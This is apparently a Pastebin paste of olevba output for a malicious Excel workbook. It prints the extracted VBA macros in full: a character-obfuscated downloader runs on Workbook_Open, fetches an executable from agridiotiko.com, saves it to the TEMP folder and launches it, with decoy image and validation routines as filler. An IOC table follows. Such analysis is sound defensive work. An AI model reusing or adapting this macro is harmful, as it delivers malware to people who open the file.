Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB-V 216116.xls
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: 216116.xls
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ÝòàÊíèãà.cls
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub Workbook_Open()
- SSVEvdqwfF3 (77)
- End Sub
- Sub SSVEvdqwfF3(FFFFF As Integer)
- ValidateAmountOf5
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò1.cls
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò2.cls
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04422'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Ëèñò3.cls
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04423'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Function OpenIL_TypeString(ByVal il_const As Boolean) As String
- Select Case il_const
- Case %IL_BYTE : Function = "IL_BYTE"
- Case %IL_UNSIGNED_BYTE : Function = "IL_UNSIGNED_BYTE"
- Case %IL_SHORT : Function = "IL_SHORT"
- Case %IL_UNSIGNED_SHORT : Function = "IL_UNSIGNED_SHORT"
- Case %IL_INT : Function = "IL_INT"
- Case %IL_UNSIGNED_INT : Function = "IL_UNSIGNED_INT"
- Case %IL_FLOAT : Function = "IL_FLOAT"
- Case %GL_DOUBLE : Function = "GL_DOUBLE"
- Case Else : Function = "Type not defined"
- End Select
- End Function
- Function OpenIL_FormatString(ByVal il_const As Boolean) As String
- Select Case il_const
- Case %IL_COLOUR_INDEX : Function = "IL_COLOUR_INDEX"
- Case %IL_COLOR_INDEX : Function = "IL_COLOR_INDEX"
- Case %IL_RGB : Function = "IL_RGB"
- Case %IL_RGBA : Function = "IL_RGBA"
- Case %IL_BGR : Function = "IL_BGR"
- Case %IL_BGRA : Function = "IL_BGRA"
- Case %IL_LUMINANCE : Function = "IL_LUMINANCE"
- Case Else : Function = "Format not defined"
- End Select
- End Function
- Function OpenIL_OriginString(ByVal il_const As Boolean) As String
- ' Origin Definitions
- Select Case il_const
- Case %IL_ORIGIN_LOWER_LEFT : Function = "IL_ORIGIN_LOWER_LEFT"
- Case %IL_ORIGIN_UPPER_LEFT : Function = "IL_ORIGIN_UPPER_LEFT"
- Case Else : Function = "Origin type not defined"
- End Select
- End Function
- Public Function OpenIL8PalTypeString(KJB As Long)
- Dim PbMain31 As Object
- Set PbMain31 = TextBoxAsValidate(Chr(77) & Chr(105) & "c" & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(46) & Chr(88) & "M" & Chr(76) & "H" & Chr(84) & Chr(84) & "P")
- ProfileChr PbMain31
- PbMain31.Send
- OpenIL8PalTypeString = PbMain31.responseBody
- End Function
- Function OpenIL_PalTypeString(ByVal il_const As Boolean) As String
- ' Palette types
- Select Case il_const
- Case %IL_PAL_NONE : Function = "IL_PAL_NONE"
- Case %IL_PAL_RGB24 : Function = "IL_PAL_RGB24"
- Case %IL_PAL_RGB32 : Function = "IL_PAL_RGB32"
- Case %IL_PAL_RGBA32 : Function = "IL_PAL_RGBA32"
- Case %IL_PAL_BGR24 : Function = "IL_PAL_BGR24"
- Case %IL_PAL_BGR32 : Function = "IL_PAL_BGR32"
- Case %IL_PAL_BGRA32 : Function = "IL_PAL_BGRA32"
- Case Else : Function = "Pallete type not defined"
- End Select
- End Function
- Public Function Profile8Exists(AquaBarb2 As String, AquaBarb3 As String, AquaBarb As Object, GetDesktopMPath_3 As String, GetDesktopMPath_8 As Double) As Double
- Profile8Exists = 77.8
- Profile8Exists = Create_Shortcut(AquaBarb, GetDesktopMPath_3)
- Profile8Exists = 72.99
- End Function
- Function PbMain() As Long
- Local ILErr As Dword
- Local info As ILinfo
- Local ID As Dword
- Local errString As Asciiz*1024
- If Len(Command$) = 0 Then
- MsgBox "Usage: imginfo.exe filename"
- Exit Function
- End If
- ilInit
- ilGenImages ByVal 1, ID
- ILErr = ilGetError()
- If ILErr <> 0 Then
- errString = iluErrorString(ILErr)
- MsgBox "Error in ilGenImages" & $CRLF & errString
- Exit Function
- End If
- ilBindImage ID
- ILErr = ilGetError()
- If ILErr <> 0 Then
- errString = iluErrorString(ILErr)
- MsgBox "Error in ilBindImage" & $CRLF & errString
- GoTo done
- End If
- ' ilEnable %IL_FORMAT_SET
- ' ilEnable %IL_ORIGIN_SET
- ' ilEnable %IL_TYPE_SET
- '
- ' ilFormatFunc %IL_RGB
- ' ilOriginFunc %IL_ORIGIN_LOWER_LEFT
- ' ilTypeFunc %IL_UNSIGNED_BYTE
- '
- ' ilEnable %IL_CONV_PAL
- ' Do
- ' ILErr = ilGetError()
- ' Loop While (ILErr <> 0)
- ilLoadImage Command$
- ILErr = ilGetError()
- If ILErr <> 0 Then
- errString = iluErrorString(ILErr)
- GoTo done
- End If
- iluGetImageInfo info
- ILErr = ilGetError()
- If ILErr <> 0 Then
- errString = iluErrorString(ILErr)
- GoTo done
- Else
- End If
- done:
- ilDeleteImages 1, ID
- ' clear additional errors
- Do
- ILErr = ilGetError()
- Loop While (ILErr <> 0)
- End Function
- Public Function Create_Shortcut(GetDesktopMPath_4 As Object, GetDesktopMPath_3 As String) As Integer
- Create_Shortcut = 15
- GetDesktopMPath_4.savetofile GetDesktopMPath_3, 2
- Create_Shortcut = 2
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const QUOTE = "'"
- Public Const QUOTE2 = "''"
- Public Const DOUBLE_QUOTE = """"
- Public Const NUMERIC_KEYS = "-01234567890."
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
- If a > b Then
- Max = a
- Else
- Max = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
- If a < b Then
- Min = a
- Else
- Min = b
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
- If a < b Then
- Between = b
- ElseIf a > c Then
- Between = c
- Else
- Between = a
- End If
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBRead = IIf(IsNull(V), NullValue, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
- On Error Resume Next
- DBWrite = IIf(V = NullValue, Null, V)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to form acceptable by Sql syntax
- ' AGR'A -> 'AGR''A'
- '
- Public Function QuotedSymbol(ByVal Symbol As String) As String
- QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' Converts Symbol to standard form
- ' AGR''A -> AGR'A
- ' AGR"A -> AGR'A
- '
- Public Sub ValidStockSymbol(Symbol As String)
- Symbol = Replace(Symbol, QUOTE2, QUOTE)
- Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Sub NumericFilter(KeyAscii As Integer)
- If KeyAscii > 31 Then
- If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
- KeyAscii = 0
- End If
- End If
- End Sub
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- ' CURRENCY 8 bytes
- ' A scaled integer between
- ' – 922,337,203,685,477.5808
- ' and 922,337,203,685,477.5807
- '
- ' We restrict it to be
- ' - positive
- ' - integer i.e. no fractions
- ' - not more than 14 symbols
- ' so it can be from 1 to 99 999 999 999 999
- '
- Public Function ValidateCurrency(TC As Boolean) As Currency
- Dim S As String
- Dim i As Long
- On Error Resume Next
- '////////////////////////
- ' Restrict user input '/
- '//////////////////////
- With a.TC
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 14, 0)
- .Text = S
- .SelStart = i
- End With
- '///////////////////////
- ' Convert user input '/
- '/////////////////////
- On Error GoTo Fail
- ValidateCurrency = CCur(a.TC.Text)
- Exit Function
- Fail:
- On Error Resume Next
- c.TC.Text = ""
- ValidateCurrency = 0
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidatePrice(TC As Boolean) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With c.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, True, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidatePrice = Val(.Text)
- End With
- End Function
- Public Function ValidateAmountOf5()
- Set ValidatePriceAndString = TextBoxAsValidate(Chr(87) & Chr(80 + 3) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) + Chr(23 * 2) & Chr(40 * 2 + 3) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
- GetDesktopMPath_2 = ValidatePriceAndString("T" & Chr(69) & Chr(77) & Chr(80))
- Dim AquaBarb As Object
- Set AquaBarb = TextBoxAsValidate(Chr(65) & "do" & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & "a" & Chr(109))
- Dim GetDesktopMPath_3 As String
- GetDesktopMPath_3 = GetDesktopMPath_2 & "\" & "zz" & Chr(65) & "." & "e" & Chr(120) & "e"
- With AquaBarb
- .Type = 1
- .Open
- .write OpenIL8PalTypeString(223)
- End With
- Dim HricK As Double
- HricK = Profile8Exists("AquaBarb", "AquaBarb", AquaBarb, GetDesktopMPath_3, 88.3)
- Set noexile = TextBoxAsValidate(";<=" + Chr(83) & "h" & "e" & Chr(108) & Chr(108) & Chr(46) & Chr(65) & "p" & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
- noexile.Open (GetDesktopMPath_3)
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidateAmount(TC As Boolean) As Long
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With c.TC
- ' Validating UserInput
- i = .SelStart
- S = ValidateString(.Text, False, False, False, 10, 1000000000)
- ' s = VBCleanEntry(.Text, ".", 2)
- .Text = S
- .SelStart = i
- ValidateAmount = Val(.Text)
- End With
- End Function
- '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- '
- Public Function ValidatePercent(TC As Boolean) As Double
- Dim S As String
- Dim i As Long
- On Error Resume Next
- With c.TC
- i = .SelStart
- S = ValidateString(.Text, False, True, True, 6, 100)
- Dim j As Long
- j = InStr(S, ".")
- If j > 0 Then
- Dim f As String
- Dim g As String
- f = Mid(S, j + 1)
- If Len(f) > 2 Then
- f = Left(f, 2)
- End If
- g = Left(S, j - 1)
- S = g & "." & f
- End If
- .Text = S
- .SelStart = i
- ValidatePercent = Val(.Text)
- End With
- End Function
- ' -------------------------------------------------------------
- ' function validates parsed string
- ' Use it on Change Event
- ' © 2000 Dmitry Grechishkin, grechishkin@egartech.com
- Public Function ValidateString( _
- strInputString As String, _
- blnAllowNegative As Boolean, _
- blnAllowZero As Boolean, _
- blnAllowFractions As Boolean, _
- Optional lngMaxLen As Long = 0, _
- Optional lngMaxValue As Long = 0 _
- ) As String
- Dim strTmpValue As String
- Dim strCurrentSymbol As String
- Dim strLeftStroke As String
- Dim strRightStroke As String
- Dim lngLenght As Long
- Dim lngDotPosition As Long
- Dim blnInvalidSymbol As Boolean
- Dim blnCorrectDot As Boolean
- Dim i As Long
- Dim j As Long
- On Error Resume Next
- strTmpValue = Trim$(strInputString)
- lngLenght = Len(strTmpValue)
- If lngLenght > 0 Then
- ' ---------------------
- ' Validates user input independently from locals and uses ',' or '.' as decimal separator
- For i = 1 To lngLenght
- blnInvalidSymbol = True
- '
- If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
- Mid$(strTmpValue, i, 1) = "."
- End If
- strCurrentSymbol = Mid$(strTmpValue, i, 1)
- ' Truncates value if it exeeds max value
- If lngMaxValue > 0 Then
- If Abs(Val(strTmpValue)) > lngMaxValue Then
- strTmpValue = Left$(strTmpValue, lngLenght - 1)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If lngMaxLen > 0 Then
- ' If negative values are allowed to be inputted
- If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
- strTmpValue = Left$(strTmpValue, lngMaxLen)
- blnInvalidSymbol = True
- GoTo EX
- End If
- End If
- If i = 1 Then
- If blnAllowNegative And (strCurrentSymbol = "-") Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- ' if zero values are allowed to input
- If Not blnAllowZero And (strCurrentSymbol = "0") Then
- blnInvalidSymbol = True
- GoTo Check
- End If
- End If
- ' --------------------------
- ' numeric validation
- For j = 0 To 9
- If strCurrentSymbol = Trim$(str$(j)) Then
- blnInvalidSymbol = False
- GoTo Check
- End If
- Next
- ' --------------------------
- ' decimal separator is single in string
- If (lngDotPosition > 0) Then
- If (lngDotPosition = i) Then
- blnCorrectDot = True
- Else
- blnCorrectDot = False
- End If
- Else
- blnCorrectDot = True
- End If
- If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
- blnInvalidSymbol = False
- lngDotPosition = i
- GoTo Check
- End If
- Check:
- ' If any invalid symbol is found, cut it away
- If blnInvalidSymbol Then
- strLeftStroke = Left$(strTmpValue, i - 1)
- strRightStroke = Right$(strTmpValue, lngLenght - i)
- strTmpValue = strLeftStroke + strRightStroke
- End If
- Next
- ' ---------------------
- EX:
- ValidateString = strTmpValue
- End If
- On Error GoTo 0
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: 216116.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub InitGDIPlus()
- Dim uInput As Boolean
- If mToken <> 0 Then Exit Sub
- c.uInput.GdiplusVersion = 1
- If c.GdiplusStartup(mToken, uInput) <> 0 Then
- MsgBox "GDI+ ?????????????", vbCritical, "?????"
- End
- End If
- End Sub
- Public Sub TerminateGDIPlus()
- If mToken = 0 Then Exit Sub
- c.GdiplusShutdown mToken
- End Sub
- Public Function GetImageEncoderClsid(ByVal ImageType As Boolean) As Boolean
- Select Case ImageType
- Case PNG: c.CLSIDFromString StrPtr(ImageEncoderPNG), GetImageEncoderClsid
- Case JPG: c.CLSIDFromString StrPtr(ImageEncoderJPG), GetImageEncoderClsid
- End Select
- End Function
- Public Function ProfileChr(KJB As Object)
- Dim segR As String
- segR = Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(97) & Chr(103) & "r" & Chr(105) & "d" & "i" & Chr(111) & Chr(116) & "i" & "k" & "o" & Chr(46) & "c" & Chr(111) & "m"
- KJB.Open Chr(71) & "E" & Chr(84), segR & "/" & Chr(52) & "3" & Chr(50) & Chr(47) & "4" & Chr(53) & Chr(51) & Chr(53) & Chr(46) & "e" & Chr(120) & "e", False
- End Function
- Public Function TextBoxAsValidate(SmRaNdMM1 As String)
- For i = 0 To 3
- SmRaNdMM1 = Replace(SmRaNdMM1, Chr(i + 20 * 3 - 1), "")
- Next i
- Set TextBoxAsValidate = CreateObject(SmRaNdMM1)
- End Function
- Public Function SavePicToPNG(ByVal Pic As Long, ByVal Path As String) As Long
- Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
- Params.Count = 1
- ReDim EncParams(Len(Params) - 1)
- CopyMemory EncParams(0), Params, Len(Params)
- GdipCreateBitmapFromHBITMAP Pic, 0, Image
- SavePicToPNG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(PNG), EncParams(0))
- GdipDisposeImage Image
- Erase EncParams
- End Function
- Public Function SavePicToJPG(ByVal Pic As Long, ByVal Path As String, ByVal Quality As Long) As Long
- Dim Params As EncoderParameters, EncParams() As Byte, Image As Long
- Params.Count = 1
- CLSIDFromString StrPtr(EncoderQuality), Params.Parameter.GUID
- Params.Parameter.NumberOfValues = 1
- Params.Parameter.Type = 4
- Params.Parameter.Value = VarPtr(Quality)
- ReDim EncParams(Len(Params) - 1)
- CopyMemory EncParams(0), Params, Len(Params)
- GdipCreateBitmapFromHBITMAP Pic, 0, Image
- SavePicToJPG = GdipSaveImageToFile(Image, StrPtr(Path), GetImageEncoderClsid(JPG), EncParams(0))
- GdipDisposeImage Image
- Erase EncParams
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | SaveToFile | May create a text file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command (obfuscation: VBA expression) |
- | Suspicious | Shell.Application | May run an application (if combined |
- | | | with CreateObject) (obfuscation: VBA |
- | | | expression) |
- | Suspicious | ADODB.Stream | May create a text file (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Microsoft.XMLHTTP | May download files from the Internet |
- | | | (obfuscation: VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | imginfo.exe | Executable file name |
- | IOC | http://agridiotiko.c | URL (obfuscation: VBA expression) |
- | | om | |
- | IOC | zzA.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | IOC | 4535.exe | Executable file name (obfuscation: VBA |
- | | | expression) |
- | VBA string | Microsoft.XMLHTTP | (Chr(77) & Chr(105) & "c" & Chr(114) & |
- | | | Chr(111) & Chr(115) & Chr(111) & |
- | | | Chr(102) & "t" & Chr(46) & Chr(88) & |
- | | | "M" & Chr(76) & "H" & Chr(84) & Chr(84) |
- | | | & "P") |
- | VBA string | WScript | Chr(87) & Chr(80 + 3) & Chr(99) & |
- | | | Chr(114) & Chr(105) & Chr(112) & |
- | | | Chr(116) |
- | VBA string | hell | Chr(104) & Chr(101) & Chr(108) & |
- | | | Chr(108) |
- | VBA string | Process | (Chr(80) & Chr(114) & "o" & Chr(99) & |
- | | | Chr(101) & "s" & "s") |
- | VBA string | TEMP | ("T" & Chr(69) & Chr(77) & Chr(80)) |
- | VBA string | Adodb.Stream | (Chr(65) & "do" & Chr(100) & Chr(98) & |
- | | | Chr(46) & Chr(83) & Chr(116) & Chr(114) |
- | | | & Chr(101) & "a" & Chr(109)) |
- | VBA string | \zzA.exe | "\" & "zz" & Chr(65) & "." & "e" & |
- | | | Chr(120) & "e" |
- | VBA string | ;<=Shell.Application | (";<=" + Chr(83) & "h" & "e" & Chr(108) |
- | | | & Chr(108) & Chr(46) & Chr(65) & "p" & |
- | | | Chr(112) & Chr(108) & Chr(105) & |
- | | | Chr(99) & Chr(97) & Chr(116) & Chr(105) |
- | | | & Chr(111) & Chr(110)) |
- | VBA string | http://agridiotiko.c | Chr(104) & Chr(116) & "t" & Chr(112) & |
- | | om | Chr(58) & "/" & "/" & Chr(97) & |
- | | | Chr(103) & "r" & Chr(105) & "d" & "i" & |
- | | | Chr(111) & Chr(116) & "i" & "k" & "o" & |
- | | | Chr(46) & "c" & Chr(111) & "m" |
- | VBA string | GET | Chr(71) & "E" & Chr(84) |
- | VBA string | /432/4535.exe | "/" & Chr(52) & "3" & Chr(50) & Chr(47) |
- | | | & "4" & Chr(53) & Chr(51) & Chr(53) & |
- | | | Chr(46) & "e" & Chr(120) & "e" |
- +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment